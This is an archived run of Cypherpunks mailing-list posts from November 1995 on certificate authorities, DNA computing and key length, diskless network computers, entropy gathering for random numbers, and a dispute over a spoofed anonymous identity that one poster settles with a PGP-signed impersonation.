I can keep talking about good stuff that has happened in the last few months for about everyone interested in the last frontier (the electronic one) and its trading posts (electronic commerce), but the fact is that there are no CAs in full production yet. Yeah! Verisign is around .... Santa Clara. Of course I have other choices (Did I say great choices?) like Cost in Sweden and at one time EuroCert in England was advertising on the net.

I have been asking myself ... WHY? I can't accept the standard response: Fear to liability! Granted that the liability factor is important but my gut feeling tells me that's not the whole story. The hardware and the software is out there (I haven't commented on the quality of this stuff!). I thought that several companies who have indicated interest have all it takes to make a successful CA but nobody seems to move reasonably fast.

Is it possible that the process of issuing and maintaining a certificate is so complex and expensive? I think that MITRE did a study for NIST and they came up with a cost of $800 per year per federal employee to maintain and administer a Federal CA.

Any suggestion?

PS I want to thank Robert Hettinga for his excellent work promoting the principles of the Cypherpunks, and for disseminating critical information that helps shape the corporate world for a better electronic future.
-------------------------------------
Juan Rodriguez i Torrent
torrejr at pcnet.com
11/27/95 23:54:24
-------------------------------------

From tcmay at got.net Mon Nov 27 22:07:06 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 14:07:06 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID:

At 4:04 AM 11/28/95, Thaddeus J. Beier wrote:
>> I am curious on whether there are any applications of the directed
>> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
>> reason for asking is that I've come across something in my field (molecular
>> genetics) that can be used to solve such problems in a couple of weeks or so.
>> -Allen
>>
>>
>Secret sharing can be done by Hamiltonian paths. No public key code has been
>found to take advantage of those, or any other NP complete problem, so far as
>I know. DNA computing really doesn't solve the Hamiltonian graph problem, it
>just makes the biggest one that you can solve a little bit bigger. 500 point
>graphs remain insoluble (pun unintended) for earth-sized vats of DNA.
>
>Really.

Thaddeus beat me to the punch, as I was going to say just about the same thing.

The work by Adleman on "vats of computers" is intriguing, but is no real solution to the problem of exponential or superexponential growth: a problem that Adleman's vat could solve with a fish tank full of DNA computers in a day could be easily outpaced by a key length "only" a bit longer.

Check the archives for many articles on this topic. Also, check the Web search engines for conferences, papers, etc. on this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From stevenw at best.com Mon Nov 27 22:31:04 1995
From: stevenw at best.com (Steven Weller)
Date: Tue, 28 Nov 1995 14:31:04 +0800
Subject: The future will be easy to use (fwd)
Message-ID:

>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this week's PC Week or Mac Week, as they both
>have several articles discussing this. Bottom line is that the under $1000
>computer seems to have no future either in industry or the home.
>
>Realistically, who in their right mind would buy a diskless workstation to
>connect to Internet? You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>Also, there is the fact that at the current time there are no generally
>useable apps on Internet beyond the web and most companies would rather have
>their employees doing something more productive than hanging ten.
>
>Anyone who bases their business on this technology won't have a business.

The same sort of things could be said of the telephone compared with written correspondence. Why would anyone have one in their business or home?
Anyone can overhear a conversation, people will just chat, the only thing you can do with it is talk, there is no record of the correspondence, why would anyone want to talk to people on the other side of town? etc.

Think telephone, not computer. Think people over 40 who want a communication tool with zero maintenance and zero learning curve.

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw at best.com                |       -- Time Magazine, 3 July 1995

From attila at primenet.com Mon Nov 27 22:36:44 1995
From: attila at primenet.com (attila)
Date: Tue, 28 Nov 1995 14:36:44 +0800
Subject: No Subject
In-Reply-To:
Message-ID:

well, if it is not the world's greatest thinker and knowledge bearer on Nostradamus posting an announcement on a message we've already seen at least twice, and hashed.

read the threads before you post!

From jordan at Thinkbank.COM Mon Nov 27 22:36:51 1995
From: jordan at Thinkbank.COM (Jordan Hayes)
Date: Tue, 28 Nov 1995 14:36:51 +0800
Subject: Internet Terminals
Message-ID: <199511280620.WAA25319@Thinkbank.COM>

    From mclow at owl.csusm.edu Mon Nov 27 20:07:37 1995

    Would you write and send e-mail if you had no way of archiving it?

This is what AOL is.

    Would you use "net-quicken", if it required all your data to be
    stored on a shared disk at Intuit?

Who are you kidding? All your banking information is stored *at your bank* today; how is that any different?

OBCrypto: none.

/jordan

From mp at moonmac.com Mon Nov 27 22:53:20 1995
From: mp at moonmac.com (Michael Pearce)
Date: Tue, 28 Nov 1995 14:53:20 +0800
Subject: ETH_ic?
Message-ID:

Nb5s $bp2s writes,
>> ...the case has killed the hacker ethic. "If I saw someone
>> on the Internet with a security weakness, at this point
>> I would be reluctant to act the Good Samaritan and
>> report it," said Jeffrey Kegler, an independent software
>> consultant in Sunnyvale Calif. "If I saw weakness in
>> Intel's machine, I'd keep it to myself."

If I saw a weakness in Intel's machine I would happily inform the company in the safest way possible: posting it to Cypherpunks, alt.destroy.microsoft, comp.sys.intel and any other appropriate newsgroup, via anonymous server. I'm sure the information would wind up in the correct hands _eventually_.

Not that I'm suggesting anything, of course.

|^^^^^^Please don't add "*@aol.com" to your twit filter. Thank you.^^^^^^|
|  mklprc at aol.com                  |  "Give them a light and they'll   |
|  mp at moonmac.com                 <*>  follow it anywhere!"            |
|  http://www.teleport.com/~mklprc/  |       -- Firesign Theater         |
|   No Microsoft products were used in the production of this message.   |
\----smuggle FSF terrorist BATF (fnord) FBI nuclear Saddam PGP Clinton---/

From jamesd at echeque.com Mon Nov 27 23:07:11 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 15:07:11 +0800
Subject: The future will be easy to use
Message-ID: <199511280658.WAA23722@blob.best.net>

At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
> it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Skip the talking to the government bit: Ignore, do not confront.

 ---------------------------------------------------------------------
                                       |
We have the right to defend ourselves  |   http://www.jim.com/jamesd/
and our property, because of the kind  |
of animals that we are. True law       |   James A. Donald
derives from this right, not from the  |
arbitrary power of the state.          |   jamesd at echeque.com

From jamesd at echeque.com Mon Nov 27 23:39:47 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 15:39:47 +0800
Subject: The future will be easy to use
Message-ID: <199511280731.XAA11527@blob.best.net>

At 08:38 PM 11/27/95 -0500, James Black wrote:
> As soon as PGP 3.0 is released I am planning on incorporating PGP into
>Pine, and start putting it into more programs, to increase the usage of
>encryption things before they go out.

Is there any public spec for PGP 3.0?

 ---------------------------------------------------------------------
                                       |
We have the right to defend ourselves  |   http://www.jim.com/jamesd/
and our property, because of the kind  |
of animals that we are. True law       |   James A. Donald
derives from this right, not from the  |
arbitrary power of the state.          |   jamesd at echeque.com

From ses at tipper.oit.unc.edu Mon Nov 27 23:48:27 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Tue, 28 Nov 1995 15:48:27 +0800
Subject: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID:

On Mon, 27 Nov 1995, Jim Choate wrote:

>
> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

We've had this discussion sort of before, but not involving consoles yet, so I'll throw in my 2p.

It isn't likely to be worth doing this with a sony play-station; its DSP capabilities are nothing special, and you're paying way too much for irrelevant stuff like CD-ROMs, 3D accelerators, etc. For the same money you could get a load of 56Ks or some of the TI chips.
If you must cannibalise a game system, you'd be better off using either a Sega Saturn (more general purpose CPU power), or mayhaps ripping apart an Atari Jaguar, which has some nice custom DSP hardware, with a big fat bus to play with. It'd still be more of a stupid pet trick than a real solution, but definitely a neat hack.

Non-crypto.

BTW, I wouldn't be surprised if we do get to see some sort of Internet software for the next generation consoles. I remember getting a pretty good spit-take out of some of the NCSA guys at the WWW-WW in 93 when I mentioned AT&T were bringing out a modem for the sega genesis, and we were thinking about getting a dev kit and taking a shot at 'Sonic the Webhog' (turned out to be impractical - bit rate was too low, dev kits too expensive). With the new systems, the dynamics have changed (nvram in the machines, faster comms, more memory and CPU).

I still think that the idea of selling dickless workstations for the home is perhaps not the best response to rapidly falling disk prices; however, if you raise the price by $100, and use that money to add a 500Mb/1Gb hard drive, the whole thing becomes a lot more interesting - that's enough storage to keep your locally created data around (unlikely to exceed 100Mb), whilst using the rest as a cache for stuff that really lives on the network. If I had any shirts worth betting I wouldn't put them on this concept, but it might be interesting.

Simon

From jcobb at ahcbsd1.ovnet.com Tue Nov 28 00:32:30 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 28 Nov 1995 16:32:30 +0800
Subject: No Privacy Right in UK ? - Part 2
Message-ID:

Friend,

11 27 95 Press Association News in the UK reports:

  STORM AS SPY CAMERA `JUICY BITS' SET FOR SALE

"Furious MPs are demanding action," cries the story.

Why?

  Their anger follows a row over the sale in video shops of "juicy bits" from closed circuit TV cameras fixed in high streets and stores to detect crime.
High streets: where the fashionable retail shops are.

  One extract showed a couple having sex in a doorway, unaware they were being watched.

It wasn't me, Mums, I swear!

A Liberal Democrat family spokeswoman:

  "That this sale has been allowed is a disgrace and will undermine the trust the public has in cameras designed to cut crime."

A Labour MP:

  "This situation plainly leaves people wide open to blackmail."

He said "some of his constituents in Linlithgow had recently been compromised by such a video."

A sly dog at the Home Office:

  "We have not seen the video [good move!], but judging from what has been said about it, it would have to be classified by the British Board of Film Classification if it is being sold."

If we don't have privacy, we do have censorship!

But Mums, I swear...

Cordially,

Jim

NOTE. The Press Association website's URL: http://www.pa.press.net

The newsstory's online filename: pick8.html.

From mclow at owl.csusm.edu Tue Nov 28 00:33:19 1995
From: mclow at owl.csusm.edu (Marshall Clow)
Date: Tue, 28 Nov 1995 16:33:19 +0800
Subject: Internet Terminals
Message-ID:

Jim Choate sez:
>Forwarded message:
>
>> Subject: Re: The future will be easy to use
>> From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
>> Date: Mon, 27 Nov 95 21:28:05 EST
>>
>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this week's PC Week or Mac Week, as they both
>have several articles discussing this. Bottom line is that the under $1000
>computer seems to have no future either in industry or the home.
>
I agree and disagree. ;-)

The "internet terminal", or "internet appliance", as it is sometimes called, is IMHO, worthless. Would you write and send e-mail if you had no way of archiving it? Would you use "net-quicken", if it required all your data to be stored on a shared disk at Intuit? (There was an interview on NPR 11/17 where this was touted as "the next big thing"!)

On the other hand, I believe that a <$1000 computer would be a big seller. From a marketing point of view, there's just something about a price tag with three digits left of the decimal point, even if they're all nines :-) The tough part is making it usable, and making some money on it.

[ I've got this 386-40, with 1 MB RAM and a 40MB hd, see... ]

>Realistically, who in their right mind would buy a diskless workstation to
>connect to Internet?
>
No one.

>You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>
Actually, I think the plan is to boot from ROM.

>Anyone who bases their business on this technology won't have a business.
>
I agree.

-- Marshall

Marshall Clow
Aladdin Systems
mclow at mailhost2.csusm.edu

"Eternal vigilance is the price of PostScript" -- MacUser Jan 96 DTP and Graphics column

From tcmay at got.net Tue Nov 28 00:38:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 16:38:51 +0800
Subject: Diskless "Eunuchs" Machines Likely to Fail
Message-ID:

At 6:17 AM 11/28/95, Steven Weller wrote:

>The same sort of things could be said of the telephone compared with
>written correspondence. Why would anyone have one in their business or
>home? Anyone can overhear a conversation, people will just chat, the only
>thing you can do with it is talk, there is no record of the correspondence,
>why would anyone want to talk to people on the other side of town? etc.
>
>Think telephone, not computer. Think people over 40 who want a
>communication tool with zero maintenance and zero learning curve.
I'm skeptical of the "Diskless Internet Box = Telephone" analogy. Folks I know who are not computer-savvy, or who have other things they'd rather be doing, are not likely, as I see it, to buy boxes that still require them to type messages to other people but that don't allow them to download and save the interesting stuff they find. The telephone appealed to those who truly wanted to "just keep talking"...that was the beauty of it. Most people don't know how to touch-type, and typing by hunting-and-pecking is painful and unnatural for most people.

A couple of years ago "the computer for the rest of us" was said to be a pen-based Newton-type machine, now it is said to be a diskless, memory-limited "Eunuchs" machine.

(The diskless--and disketteless--systems I've seen described recently would make it impossible for me to interact as I currently do. To be sure, maybe "data storage services" will spring up to temporarily store stuff one has snarfed, but the download to one's home terminal still must be done again. Faster modems, and cable modems, will change things somewhat, but then this is a huge change in a lot of ways, in any case. Even the stereotypical "chatters" at AOL are heavy users of local storage: witness the massive number of "me too!" posts from AOLers whenever a nude GIF or JPEG of Sandra Bullock or Jennifer Anniston is mentioned...they clearly are downloading a lot of images and whatnot to home machines...that measly 4 MB of flash memory is going to get filled up mighty fast.)

By the way, Intel builds a lot of the motherboards for use by various companies. Someone at Intel claimed recently that even if the CPU was completely free (as some 486s effectively are already), Intel could not see how a system could be consistently built for under $500, including monitor, small disk, memory, etc.
(The Oracle folks are muttering about a Newton-like OS which would load objects or applets or whatever in a more efficient way...this might work, but I'm still skeptical that users' needs can be met. Those folks wanting local access to the JPEGs of Sandra Bullock will still be out of luck....)

I see a greater chance that home game machines, such as the 3DO and Sony PlayStation machines will get Web browsers done for them than I do that people will buy machines that are so limited.

The only relevance of this whole topic to Cypherpunks is....is....minimal.

--Tim May, who plans to find a way to use this boondoggle idea by Oracle to make money. (Right now I'm long Oracle, but this may soon change.)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From perry at piermont.com Tue Nov 28 03:39:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 19:39:39 +0800
Subject: Directed Hamiltonian Path Problem
In-Reply-To:
Message-ID: <199511280616.BAA11852@jekyll.piermont.com>

Timothy C. May writes:
> The work by Adleman on "vats of computers" is intriguing, but is no real
> solution to the problem of exponential or superexponential growth: a
> problem that Adleman's vat could solve with a fish tank full of DNA
> computers in a day could be easily outpaced by a key length "only" a bit
> longer.

Indeed. It's the problem with innumeracy.
People don't understand that if, say, a problem is O(2^N), and a problem of size 1000 requires a liter of fluid, a problem of size 2000 requires

107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
359845775746985748039345677748242309854210746050623711418779541821530\
464749835819412673987675591655439460770629145711964776865421676604298\
31652624386837205668069376

liters of fluid. I'll note that is something like

107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
3598457757469857480393456777482423098542107460506237114187795418

times more liters of fluid than there are fundamental particles in the universe -- being too lazy to calculate the number of fundamental particles in a liter, I won't make the more relevant statement of what multiple of the number of particles in the universe the number of particles in that number of liters of fluid would be.

The stuff on quantum factoring worries me more than Adleman fluid -- I never can get an explanation of it clear enough to decide if it is more than a theoretical concern.

Perry

From anonymous-remailer at shell.portal.com Tue Nov 28 03:54:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 19:54:06 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511281032.CAA21495@jobe.shell.portal.com>

On Sun, 26 Nov 1995, Perry E. Metzger wrote:

> Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > I have never signed any of my posts to this mailing list and frankly have
> > no intention of beginning at this point.
>
> Well, signed Alice posts have shown up, so we will just have to assume
> that the above was a spoof and that the signed Alice posts are the
> real ones, now won't we?

Perry. Normally I try my best to ignore you.
But I will simply repeat, I have never signed a post, and have no intention of beginning to sign any posts, until I establish a secure machine in a secure complex that is dedicated to that purpose.

I like to think that I take my security somewhat seriously.

And I would ask whoever DID post the PGP key under my name, to please issue a revocation certificate.

> Perry

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From weidai at eskimo.com Tue Nov 28 04:02:03 1995
From: weidai at eskimo.com (Wei Dai)
Date: Tue, 28 Nov 1995 20:02:03 +0800
Subject: towards a theory of reputation
In-Reply-To:
Message-ID:

On Wed, 22 Nov 1995, Michael Froomkin wrote:

> This discussion puzzles me. I thought we were bombarded with
> reputational goods all the time: brand names, stocks (what is a purchase
> in the 2ndary market but a purchase of reputation most of the time?),
> degrees from famous universities. Anonymity complicates matters only if
> no systems of unique ID is used. Throw in digital signatures and we are
> back at brand names, aren't we?

It's true that we deal routinely with reputations now. However there is very little formal analysis of reputation as a concept. Although our common sense knowledge of reputations seems to serve us fairly well(*), there is no guarantee that it will scale well to an anonymous market where both the number of participants and the importance of reputation are much higher.

* However, the government apparently doesn't think so. Witness the FDA and the SEC.

We need to have formal algorithms to deal with reputations, and we need to be able to show that they have desirable properties. This will reduce transaction costs and help bring anonymous markets into the mainstream.

Perhaps more importantly, good reputation algorithms will make agorics computing possible.
There is a very interesting proposal for a network routing system based on microcurrency and positive reputations (see http://www.webcom.com/agorics/dsr.html). However it does not say what algorithms will be used to handle reputations. If the system is actually implemented, its proper functioning will depend as much on the properties of the reputation algorithms used as on the correctness of its protocols.

Wei Dai

From hal9001 at panix.com Tue Nov 28 04:26:03 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Tue, 28 Nov 1995 20:26:03 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID:

At 11:12 11/27/95, Dan Harmon wrote:

>One reason for the ssn's is that it may be a LEA sponsored promo. If you are
>dumb enough to have a warrant or some other judgement against you and you
>give your ssn and address to a person or entity that you don't know then
>shame on you.

This reminds me of an incident that occurred in California last year. A number of people received a notice that they had just won an all-expenses-paid trip. Most of them turned up to get their gift only to then discover that it was a Government Sting Operation and that the trip was to Jail (they were all wanted on outstanding warrants which were waiting for them when they arrived at the meeting site).

From pati at ipied.tu.ac.th Tue Nov 28 04:31:27 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Tue, 28 Nov 1995 20:31:27 +0800
Subject: The future will be easy to use (fwd)
In-Reply-To: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
Message-ID:

On Mon, 27 Nov 1995, John Young wrote:

> >Don't hold your breath. The current market surveys say
> >that there is no market for them. Check out this weeks
> >PC Week or Mac Week, as they both have several
> >articles discussing this. Bottom line is that the under
> >$1000 computer seems to have no future either in
> >industry or the home.
>
> Peter Lewis reports in today's NYT on "doubts about the fantasy
> of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying,

I was using a Commodore 64 and a 300 bps modem for networking to the old online services of the day. That whole setup cost less than 300 dollars at the time, and had a disk drive too. I guess it would be feasible to make a really cheap machine, fit it with a more modern modem and connect it to the internet. I feel sad when they say that the market for <1000 $ machines is nil, I had so much fun and learned so much from my old machines.

-------------------------------------------------------------------------------
Patiwat Panurach                Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th   Boldness has genius, power and magic in it.
m/18 junior Fac of Economics    -Johann W.Von Goethe
-------------------------------------------------------------------------------

From anonymous-remailer at shell.portal.com Tue Nov 28 04:43:04 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 20:43:04 +0800
Subject: bit quiet in here lately
Message-ID: <199511281234.EAA17790@jobe.shell.portal.com>

On Fri, 24 Nov 1995, David K. Merriman wrote:

> At 02:11 AM 11/24/95 -0500, futplex wrote:
> >sameer writes:
> >> I am working on a spec which myself and others will turn into
> >> an internet draft, for placements on the standards track. It will
> >> standardize remailer commands and nymserver commands, and will
> >> incorporate payment. Once we get a draft written up it will be posted
> >> for review, flames, and criticism.

[snip to save bandwidth]

> Now, if the remailer service-listing operators could agree on a standard
> format for their reporting (lag time, feature lists, etc), then it would
> simplify maintaining a list of remailers - which would increase the
> usability of the remailer system, and help the use and growth of remailers.
The remailer operators can't even agree on a standard header syntax. Some support one header to request remailing, while others support another.

I remember some time ago, that I was using a non-compliant (i.e. unique) remailer located in Berkeley. I was trying to post some information that would have helped to expedite the FDA approved study on medicinal marijuana.

The article detailed that Health & Welfare Canada was growing a bumper high-potency crop to help teach the Edmonton city police about the wicked weed. Especially, cultivation techniques.

I thought that this might be "helpful" to the medicinal marijuana study. I thought that since the Canadian Government was granting licenses to help law enforcement, that they might not be opposed to studying its possible health benefits as well.

(Canada's government funded health care system, could use some cost saving measures. If there is something useful there, it could help redirect funding, and indirectly ameliorate the current waiting lists and service cuts for all Canadians.)

I thought that the study organizers in the United States, MAPS I believe -- the ones who had complied with all US laws and regulations and permits and headed up by a guy named, Rick Doblin, a fellow who's apparently writing a thesis on Public Policy at the Kennedy School of Government at Harvard -- I thought that the study organizers might be able to get what they needed from the Canadian FDA equivalent, Health & Welfare, Canada.

(Disclaimer: Unofficially, of course, not speaking for Health & Welfare Canada. I have absolutely no connection with anyone, anywhere or anything at all in any possible form whatsoever. In fact this post may well be the product of random typing by a simian life form.)

Silly me. The damn post never was posted. It was either edited out of the data stream, or something else nefarious occurred. I mailed the remailer-operator about this, and asked: "What's the problem?"
And the remailer operator didn't reply to the message. *Sigh*

Now, no-one in Berkeley, not a cypherpunk of all people, could be opposed to seeing marijuana legalized, now could they?? I mean not, California, eh??

Maybe, I just couldn't figure out how to post, and how to use a remailer. I don't know. Or maybe I had one too many beers and should've stuck to having sodas.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

P.P.S. (Come on down for a briefing to msri ... ya ... right ... "persuasion" just isn't all that appetizing, Joe ... ;)

From rah at shipwright.com Tue Nov 28 04:55:16 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 28 Nov 1995 20:55:16 +0800
Subject: (fwd) Netscape V2 and Certificates
Message-ID:

--- begin forwarded text

From: John Hemming CEO MarketNet
Date: Thu, 23 Nov 1995 18:54:36 PM PST
To: www-buyinfo at allegra.att.com
Mime-Version: 1.0
Subject: Netscape V2 and Certificates

We have now spent an interesting time looking at Netscape V2. If you are interested in looking at V2 and how it relates to certificates not signed by Verisign please take version 0.15b of Workhorse at ftp://193.119.26.70/mktnet/pub/horse.zip (Windows 3.1) switch on the WWW server and try it out.

Basically the client allows an SSL link to a server "signed" by a CA that it does not know ("EuroSign") the only problem being that if it does not know the CA then it cannot check the signature.

I do think this is a major improvement, however, in that it raises properly the issue of authentication of servers and makes it clear that the client user should properly consider the server. At the end of the day the commercial strengths of the server merchant and its authorisation is more important than who has signed its certificate.

I can happily obtain certificates for MarketNet even though there is a US MarketNet Corp. This is because I have a UK organisation called MarketNet.
The name, therefore, is not in itself significant.

It is also interesting that Netscape will be checking the domain name in the near future. Realistically many people have a large number of different domain names all pointing at the same server so a generic domain name is likely to be the most common registration anyway.

At Eurosign.com we will be offering free Certification of a Keypair. We wish to ensure that further certification actually means something commercially viable (eg a Bank regulated by the relevant organisation). However, as our first offering we will be simply certifying that we have received valid certificate requests. (they will be short term certs, however)

We have not fully allocated our domain name as yet (as far as I have been told) although the experimental server (not advised for live use as there are a number of flaws) was released today.

Eurosign's alpha test site is at http://193.118.187.106/

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From wlkngowl at unix.asb.com Tue Nov 28 05:47:42 1995
From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com)
Date: Tue, 28 Nov 1995 21:47:42 +0800
Subject: A random-noise sampling device for DOS
Message-ID:

I'm working on a random noise sampling device for DOS, and so far have a prototype version that samples the keyboard timings. I'm unsure of a good way to implement it...

Device timings (and in the future periodic samplings of the mouse position or sound-card noise input) are put into a ring-buffer of raw data and the output is a straight secure hash of it... (when the output buffer is used it, it just rehashes the data in the buffer at the moment...)
I'm looking for some advice on how to determine when the raw data has been "used up" and worth processing/encrypting before re-hashing it...

This in mind, offers for eventual beta-testers (announcement will follow when it's ready), or suggestions for features (what to sample, device interfaces) would be helpful.

Thanks in advance,
Rob

From perry at piermont.com Tue Nov 28 05:54:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 21:54:10 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281340.IAA13518@jekyll.piermont.com>

Someone pretending to be Alice has said:

> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
[...]
> But I will simply repeat, I have never signed a post,

Perhaps *you* have never signed a post, but how do we know who *you* are. You could be someone we've never heard from before. Anyone could be putting the Alice de 'nonymous signature on the bottom of something they've written. The only way to know for sure is digital signatures.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate.

How do we know you aren't just spoofing us?

.pm

From perry at piermont.com Tue Nov 28 06:19:42 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 22:19:42 +0800
Subject: A random-noise sampling device for DOS
In-Reply-To:
Message-ID: <199511281407.JAA13573@jekyll.piermont.com>

wlkngowl at unix.asb.com writes:

> I'm working on a random noise sampling device for DOS, and so far have
> a prototype version that samples the keyboard timings. I'm unsure of
> a good way to implement it...
>
> Device timings (and in the future periodic samplings of the mouse
> position or sound-card noise input) are put into a ring-buffer of raw
> data and the output is a straight secure hash of it... (when the
> output buffer is used it, it just rehashes the data in the buffer at
> the moment...)

Doesn't sound good.

> I'm looking for some advice on how to determine when the raw data has
> been "used up" and worth processing/encrypting before re-hashing it...

What I would suggest is accumulating enough data that you think you have enough entropy for one hash function's worth of output, hash it, and put that into an output queue. Then don't reuse the data, or if you do, reuse it in combination with enough new data that you think the new data has one hash function output's worth of entropy.

Perry

From anonymous-remailer at shell.portal.com Tue Nov 28 06:22:44 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 22:22:44 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511281400.GAA22636@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 Nov 1995, an impostor posing as Alice de 'nonymous wrote:

> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
>
> > Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > > I have never signed any of my posts to this mailing list and frankly have
> > > no intention of beginning at this point.
> >
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
>
> Perry. Normally I try my best to ignore you.
>
> But I will simply repeat, I have never signed a post, and have no
> intention of beginning to sign any posts, until I establish a secure
> machine in a secure complex that is dedicated to that purpose.
This insistence on not making use of authentication tools at the same time as whining about people spoofing you is what caused me to assume your identity. You were given ample warning. Consider it a demonstration of why you should do just what you are stubbornly refusing to do: generate yourself a damn key! It is the best way to ensure a persistent persona whilst retaining anonymity.

> I like to think that I take my security somewhat seriously.

For a purportedly security conscious impostor, you sure are reluctant to make use of simple authentication tools. Your risk assessment is seriously out of whack too. You do *not* need a secure machine to improve the level of authentication of your posts: signing your posts would provide better authentication than no authentication, even if the machine is not tempest shielded, nor in a secure installation.

Finding your machine (we don't know remember), and installing a kernel patch to catch your passphrase as it is typed in, or snag it from PGP's core image is much harder to achieve, even if you are using a multi user system. PGP signing your post will give a much better authentication than people who post from known email addresses; forgeries, and machine breakins are not that hard to effect.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate.

Oh so you do care about authentication :-) An offer: you post your own key, and I'll post a revocation. You might find that people take you more seriously once they know they are talking to a persistent persona.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLsT3obu8OQjKS7RAQE62gQAoTxWo6Dipa1bZeNi5NygZ/9CLJ2pn44s
KN2TFWY0n1KPC4tibEM88GOI7vHCCLE8t/XQ2zx5YArjd/7toCidAlUY07vQ6ums
sL4J8oV4JDKdpq9WTWaTS/unBww8qBJRVDBHigtiOneIkmu6kfuBEh0JR+a5plfQ
00GQ4SfcyBk=
=SAXZ
-----END PGP SIGNATURE-----

From Ted_Anderson at transarc.com Tue Nov 28 06:31:54 1995
From: Ted_Anderson at transarc.com (Ted_Anderson at transarc.com)
Date: Tue, 28 Nov 1995 22:31:54 +0800
Subject: towards a theory of reputation
In-Reply-To:
Message-ID:

